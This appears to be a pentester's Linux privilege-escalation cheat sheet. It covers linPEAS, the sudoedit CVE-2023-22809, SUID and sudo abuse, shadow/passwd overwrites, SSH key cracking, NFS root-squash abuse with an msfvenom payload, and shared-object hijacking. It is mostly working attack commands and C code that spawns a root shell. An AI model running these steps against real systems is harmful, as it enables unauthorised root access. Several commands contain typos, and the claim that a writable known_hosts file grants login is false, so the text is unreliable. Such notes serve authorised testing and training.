Local Privesc Scanner

linPEAS

LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix/MacOS hosts.

Github: https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS

Know vulnerabilities

Sudo version <= 1.9.12p1

• CVE-2023-22809

Allow a user that have sudo privileges for sudoedit to read/write all files of another user.

pezzz@flop.py:~$ EDITOR="vi -- </path/file>" sudo -u <user> sudoedit <file>

Polkit vulnerability

Dirty cow

mysql running as root

Kernel exploits

bash < 4.2-048:

How to exploit :

• Find a suid binary, check with strings what linux binary it's using

• Create a function with the same name function <path_to_used_binary> { /bin/bash -p; };

• Export it export -f /usr/sbin/service

• Run the suid binary

Commands runnable with sudo sudo -l

• If commands are runnable with NOPASSWORD then check (gtfobins)[https://gtfobins.github.io/]

• If commands are runnable with SETENV that means you can use this to set an environment variable like PYTHONPATH like this sudo -u <user> PYTHONPATH=<your/python/path> <command>. This will force the program to execute the scripts in the given path whith the rights of the sudo user. Don't forget you can always create files in /tmp.

  • abuse wilcard commands

Users' commands history

cat ~/.*history | less

You might find passwords in the history.

Binaries with the suid bit set

find / -perm -4000 2>/dev/null

Check if the binaries are exploitables for privesc on (gtfobins)[https://gtfobins.github.io/].

Cron jobs

• Abuse wildcard commands

• Abuse environment variables

Writable /etc/shadow

Generate a new hash with mkpasswd -m sha-512 <new_password> and replace the one of an user or create a new user

Writable /etc/password

Generate a new password hash with openssl passwd newpasswordhere and then replace the x of a user or create a new one

Readable /etc/shadow

Read the password's hash of the users and try to crack them

Readable ssh keys (use it to connect as the user)

If the ssh key is password protected you can use ssh2jonh.py id_rsa > tojohn.txt to convert it into a hash and the crack the password with john tojohntxt

Writable know_hosts file: add your id_rsa.pub key in it and then connect as the user

Secrets in config files

Abuse NFS configuration:

Check: cat /etc/exports How to exploit:

• Mount the nfs on your machine sudo mksir /tmp/nfs;sudo mount -o rw,vers=3 10.10.10.10:/tmp /tmp/nfs

• Generate payload msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/nfs/shell.elf

• Add suid bit and execution chmod +xs /tmp/nfs/shell.elf

• Execute the payload on the machine /tmp/shell.elf

Hijack shared objects (resource):

Requirements: * a suid binary or a binary callable with sudo * a way to make the binary call a shared object you wrote: * shared object does not exist => create it * shared object is writable => overwrite it * binary is callable with sudo and keeps LD_LIBRARY_PATH variable => export the env variable when calling the binary * /etc/ld.so.conf.d contains a config file which points to somewhere you can write => put your exploit in the pointed path How to check exploitability: * Check loaded shared objects and if there is variables like RUNPATH: readelf -d ./binary * Check if the binary finds the shared objects ldd binary * How to exploit: * write your exploit (you can replace the function name by a function used by the binary): c #include <stdio.h> #include <unistd.h> #include <sys/types.h> void _init(){ setreuid(geteuid(), geteuid()); system("/bin/bash -p"); } * compile it: gcc -shared -fPIC -nostartfiles -o lib.so exploit.c * put it somewhere where the binary will load it * run the binary